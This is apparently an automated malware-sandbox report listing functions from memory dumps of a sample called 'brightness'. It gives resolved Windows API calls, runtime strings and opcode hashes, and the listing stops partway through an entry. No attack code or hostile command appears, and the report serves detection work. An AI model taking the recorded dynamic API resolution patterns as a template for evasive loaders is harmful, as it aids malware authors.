                                                                                                                                                                          Function 0290918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                          • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                                                          • Instruction ID: f9228cf7ae809c972aa4b921f9dde4bc10fb7bb0f896420215c4036771886c98
                                                                                                                                                                          • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                                                          • Instruction Fuzzy Hash: D9A011008088200A8A803B280C0223A3088A880B20FC80F80A8F8882E0EE2E02B080E3
                                                                                                                                                                          Function 029020C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                          Function 0290D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0290D21D
                                                                                                                                                                            • Part of subcall function 0290D1E8: GetProcAddress.KERNEL32(00000000), ref: 0290D201
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                          • Opcode ID: b1935f91733bbceadf3ea79c45364184783f3005fcd3b2209cb1368dbc7cbbe9
                                                                                                                                                                          • Instruction ID: c66439b338fb7182fef4e07c91a334a49ecc3828d92aa3dac6a74dbd492b3c78
                                                                                                                                                                          • Opcode Fuzzy Hash: b1935f91733bbceadf3ea79c45364184783f3005fcd3b2209cb1368dbc7cbbe9
                                                                                                                                                                          • Instruction Fuzzy Hash: A2414461A9930C9F564C6BEDB4C44277BEEEAC87143A0451FF8088B7C4DE20BD518B79
                                                                                                                                                                          Function 02916E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02916E5E
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02916E6F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02916E7F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02916E8F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02916E9F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02916EAF
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02916EBF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                                                          • Opcode ID: 6abfe74f9c82c3b05817a0ed347a4aacb19860acb7a1d77943f821d88c4d189e
                                                                                                                                                                          • Instruction ID: 610470bf3bcca2cc7df06537e10eaac96773d3f0be4ca67f9a6f51a813db3e3d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6abfe74f9c82c3b05817a0ed347a4aacb19860acb7a1d77943f821d88c4d189e
                                                                                                                                                                          • Instruction Fuzzy Hash: B5F045A6E8931D6EB3107FB29CC18373B6DAAD0B047111929A55265AC2DBB5D4384FA0
                                                                                                                                                                          Function 02902530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029028CE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message
                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                          • API String ID: 2030045667-32948583
                                                                                                                                                                          • Opcode ID: de0876359bc6b8222e9319e106c22a17997096aac6762ecc46248af4f0f83b1c
                                                                                                                                                                          • Instruction ID: 965c69bc9fca7350f29b71a01ab0e6fd69197672bbb38626fc4e8e720c7ac934
                                                                                                                                                                          • Opcode Fuzzy Hash: de0876359bc6b8222e9319e106c22a17997096aac6762ecc46248af4f0f83b1c
                                                                                                                                                                          • Instruction Fuzzy Hash: A4A1BE30E0436C8FDB21AB2CCCC8B99B6E9EB49750F1440E5ED49AB2C6CB759985CF51
                                                                                                                                                                          Function 0290252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02902849
                                                                                                                                                                          • The unexpected small block leaks are:, xrefs: 02902707
                                                                                                                                                                          • bytes: , xrefs: 0290275D
                                                                                                                                                                          • An unexpected memory leak has occurred. , xrefs: 02902690
                                                                                                                                                                          • , xrefs: 02902814
                                                                                                                                                                          • 7, xrefs: 029026A1
                                                                                                                                                                          • Unexpected Memory Leak, xrefs: 029028C0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                                                          • Opcode ID: f0d5250a0974c315d3407a7e7aa4c0eca301e8f48ec4c699188c070390a60951
                                                                                                                                                                          • Instruction ID: 78132a34c587833c2ba08088f974a7fbcaea229588ca348150c778696aa8f7c3
                                                                                                                                                                          • Opcode Fuzzy Hash: f0d5250a0974c315d3407a7e7aa4c0eca301e8f48ec4c699188c070390a60951
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B71A030E042AC8FDF219B2CCCC8B99BAE9EB49714F1041E5D9499B2C1DB755AC5CF51
                                                                                                                                                                          Function 0290BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,0290C00B,?,?,00000000,00000000), ref: 0290BD76
                                                                                                                                                                            • Part of subcall function 0290A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                          • Opcode ID: fff1021fdecc4a033f678d0365932179b103f4a9cd5b1cff05fd49a1770402c5
                                                                                                                                                                          • Instruction ID: a66e14a08cc698c4a190d267da7493519a18fbb4643d2dee33b3d3406b1af52e
                                                                                                                                                                          • Opcode Fuzzy Hash: fff1021fdecc4a033f678d0365932179b103f4a9cd5b1cff05fd49a1770402c5
                                                                                                                                                                          • Instruction Fuzzy Hash: D7611B35A0024C9FDB04EBA4D8D0B9F77F79FC8300F109536A2059B3C5DA39E9059BA4
                                                                                                                                                                          Function 0291AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291AE38
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0291AE4F
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291AEE3
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 0291AEEF
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 0291AF03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Read$HandleModule
                                                                                                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                                          • API String ID: 2226866862-113032527
                                                                                                                                                                          • Opcode ID: 698ff356028aed3e4600bacaf04abe5ae3c91f82d4e950938108946298f3ef48
                                                                                                                                                                          • Instruction ID: ce36a6eb9a3668555669386375f815e7602141a42c9d4e89662b2bbfcdef8b91
                                                                                                                                                                          • Opcode Fuzzy Hash: 698ff356028aed3e4600bacaf04abe5ae3c91f82d4e950938108946298f3ef48
                                                                                                                                                                          • Instruction Fuzzy Hash: 063163B1A4130DBBEB20DFA9CC85F5A77ACEF45764F004550FA54AB2C0D330A950DBA0
                                                                                                                                                                          Function 0290432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,029617C8,?,?,0292E7A8,0290655D,0292D30D), ref: 02904365
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,029617C8,?,?,0292E7A8,0290655D,0292D30D), ref: 0290436B
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,029617C8), ref: 02904380
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?), ref: 02904386
                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029043A4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                          • Opcode ID: c5626afbb989c35006271acb3bf6c0fbcbb2da273ad364a32e3eae1d895b04ce
                                                                                                                                                                          • Instruction ID: 87e3c414a62833304360300d127a674629eb0793ea11f92ca4673879d2ade44d
                                                                                                                                                                          • Opcode Fuzzy Hash: c5626afbb989c35006271acb3bf6c0fbcbb2da273ad364a32e3eae1d895b04ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0B4A5FC835C7DFA10B260ADC5FAA375C47CAF30F145A05B768A44C5C7A064C88B66
                                                                                                                                                                          Function 0290AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0290ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD9
                                                                                                                                                                            • Part of subcall function 0290ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACFD
                                                                                                                                                                            • Part of subcall function 0290ACBC: GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD18
                                                                                                                                                                            • Part of subcall function 0290ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADAE
                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 0290AE7B
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0290AE98
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AE9E
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,0290AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEB3
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0290AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEB9
                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0290AEDB
                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0290AEF1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                          • Opcode ID: 3de942ebdea8667f4cf2091c4dfeb334ac9f62ac908f5a5b7ad74f51a148473b
                                                                                                                                                                          • Instruction ID: 0764f2a475b3ea557688099b47cdd5e664ab8605bc26b05211db7c028cba9d26
                                                                                                                                                                          • Opcode Fuzzy Hash: 3de942ebdea8667f4cf2091c4dfeb334ac9f62ac908f5a5b7ad74f51a148473b
                                                                                                                                                                          • Instruction Fuzzy Hash: D0112AB2558309AED600EBA4CCC5F9B77EEAB84700F40492AB754D61D0DB70E9548B66
                                                                                                                                                                          Function 0290E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E5A5
                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E5C1
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0290E5FA
                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E677
                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0290E690
                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 0290E6C5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                          • Instruction ID: 8f1ad63ad5c5f280a682bbbb9d10a775ac1b7852139e5f4078e4d458bbd62c0b
                                                                                                                                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                          • Instruction Fuzzy Hash: F551E77590062D9FCB26DB98C8C0BDAB7BDAF4D314F0045E5E649A7281DA30AF848F60
                                                                                                                                                                          Function 02903568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0290358A
                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035BD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,029035E0,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035D3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                          • Opcode ID: 1bad5c9610ba6018009855ccf8e815c9a3dbe08c628b89b3a91a09de15dd8cf1
                                                                                                                                                                          • Instruction ID: 9dc92df4cca8a4af5fa323a3b18cf1bd2fe5cc7d4eec786c677327ce353bc1ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 1bad5c9610ba6018009855ccf8e815c9a3dbe08c628b89b3a91a09de15dd8cf1
                                                                                                                                                                          • Instruction Fuzzy Hash: 3101D475A8430CBEFB21DBD0CD82BBE77ECDB48B10F1005A2BA04D65C0E674AA10DB59
                                                                                                                                                                          Function 029180C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
